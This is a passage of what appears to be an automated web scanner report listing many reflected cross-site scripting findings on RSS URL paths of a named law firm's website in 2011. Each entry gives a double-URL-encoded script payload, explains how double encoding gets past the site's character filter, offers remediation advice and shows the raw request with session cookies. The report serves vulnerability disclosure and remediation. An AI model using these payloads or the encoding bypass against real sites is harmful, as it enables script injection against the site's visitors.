Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /rss9abb7%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e3d2f01cf3f9/news_releases/rss.xml HTTP/1.1 Host: www.wileyrein.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:10:55 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dc1d0%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e98c2f7af3b5 was submitted in the REST URL parameter 2. This input was echoed as dc1d0"><script>alert(1)</script>98c2f7af3b5 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /rss/news_releasesdc1d0%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e98c2f7af3b5/rss.xml HTTP/1.1 Host: www.wileyrein.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:10:57 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ee81a%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ed27cf73a803 was submitted in the REST URL parameter 3. This input was echoed as ee81a"><script>alert(1)</script>d27cf73a803 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /rss/news_releases/rss.xmlee81a%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ed27cf73a803 HTTP/1.1 Host: www.wileyrein.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:10:58 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 32ca8%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e73f8dfaacf9 was submitted in the REST URL parameter 1. This input was echoed as 32ca8"><script>alert(1)</script>73f8dfaacf9 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /rss32ca8%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e73f8dfaacf9/practices/Advertising/rss.xml HTTP/1.1 Host: www.wileyrein.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:10:59 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5de32%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ebc55ccc6862 was submitted in the REST URL parameter 2. This input was echoed as 5de32"><script>alert(1)</script>bc55ccc6862 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /rss/practices5de32%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ebc55ccc6862/Advertising/rss.xml HTTP/1.1 Host: www.wileyrein.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:11:01 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 80e2b%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e09ca10697f5 was submitted in the REST URL parameter 3. This input was echoed as 80e2b"><script>alert(1)</script>09ca10697f5 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /rss/practices/Advertising80e2b%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e09ca10697f5/rss.xml HTTP/1.1 Host: www.wileyrein.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:11:02 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 86ab1%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e6017d2c2dff was submitted in the REST URL parameter 4. This input was echoed as 86ab1"><script>alert(1)</script>6017d2c2dff in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /rss/practices/Advertising/rss.xml86ab1%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e6017d2c2dff HTTP/1.1 Host: www.wileyrein.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:11:03 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 164d9%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e7c58cabc2d0 was submitted in the REST URL parameter 1. This input was echoed as 164d9"><script>alert(1)</script>7c58cabc2d0 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /rss164d9%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e7c58cabc2d0/practices/Antitrust/rss.xml HTTP/1.1 Host: www.wileyrein.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:11:01 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9acfd%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e287c030088b was submitted in the REST URL parameter 2. This input was echoed as 9acfd"><script>alert(1)</script>287c030088b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /rss/practices9acfd%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e287c030088b/Antitrust/rss.xml HTTP/1.1 Host: www.wileyrein.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:11:02 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bd079%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ebf831efe7af was submitted in the REST URL parameter 3. This input was echoed as bd079"><script>alert(1)</script>bf831efe7af in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /rss/practices/Antitrustbd079%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ebf831efe7af/rss.xml HTTP/1.1 Host: www.wileyrein.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:11:03 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 10885%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e9f493b0ddcb was submitted in the REST URL parameter 4. This input was echoed as 10885"><script>alert(1)</script>9f493b0ddcb in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /rss/practices/Antitrust/rss.xml10885%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e9f493b0ddcb HTTP/1.1 Host: www.wileyrein.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:11:06 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4b382%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ed866589a601 was submitted in the REST URL parameter 1. This input was echoed as 4b382"><script>alert(1)</script>d866589a601 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /rss4b382%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ed866589a601/practices/Appellate/rss.xml HTTP/1.1 Host: www.wileyrein.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:11:02 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 83f09%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e9da8d699e40 was submitted in the REST URL parameter 2. This input was echoed as 83f09"><script>alert(1)</script>9da8d699e40 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /rss/practices83f09%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e9da8d699e40/Appellate/rss.xml HTTP/1.1 Host: www.wileyrein.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:11:03 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3566d%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e021d1023e4a was submitted in the REST URL parameter 3. This input was echoed as 3566d"><script>alert(1)</script>021d1023e4a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /rss/practices/Appellate3566d%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e021d1023e4a/rss.xml HTTP/1.1 Host: www.wileyrein.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:11:06 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2c988%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e407b643948c was submitted in the REST URL parameter 4. This input was echoed as 2c988"><script>alert(1)</script>407b643948c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /rss/practices/Appellate/rss.xml2c988%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e407b643948c HTTP/1.1 Host: www.wileyrein.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:11:07 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2da3e%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e93729e4d7b0 was submitted in the REST URL parameter 1. This input was echoed as 2da3e"><script>alert(1)</script>93729e4d7b0 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /rss2da3e%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e93729e4d7b0/practices/Aviation/rss.xml HTTP/1.1 Host: www.wileyrein.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:11:03 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ed7d3%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253edd1cc3a52a5 was submitted in the REST URL parameter 2. This input was echoed as ed7d3"><script>alert(1)</script>dd1cc3a52a5 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /rss/practicesed7d3%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253edd1cc3a52a5/Aviation/rss.xml HTTP/1.1 Host: www.wileyrein.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:11:05 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d5cb1%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e7ae874bc296 was submitted in the REST URL parameter 3. This input was echoed as d5cb1"><script>alert(1)</script>7ae874bc296 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /rss/practices/Aviationd5cb1%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e7ae874bc296/rss.xml HTTP/1.1 Host: www.wileyrein.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:11:07 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2f5ee%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e49810451264 was submitted in the REST URL parameter 4. This input was echoed as 2f5ee"><script>alert(1)</script>49810451264 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /rss/practices/Aviation/rss.xml2f5ee%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e49810451264 HTTP/1.1 Host: www.wileyrein.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:11:08 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e654b%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ed4d67e0d85e was submitted in the REST URL parameter 1. This input was echoed as e654b"><script>alert(1)</script>d4d67e0d85e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
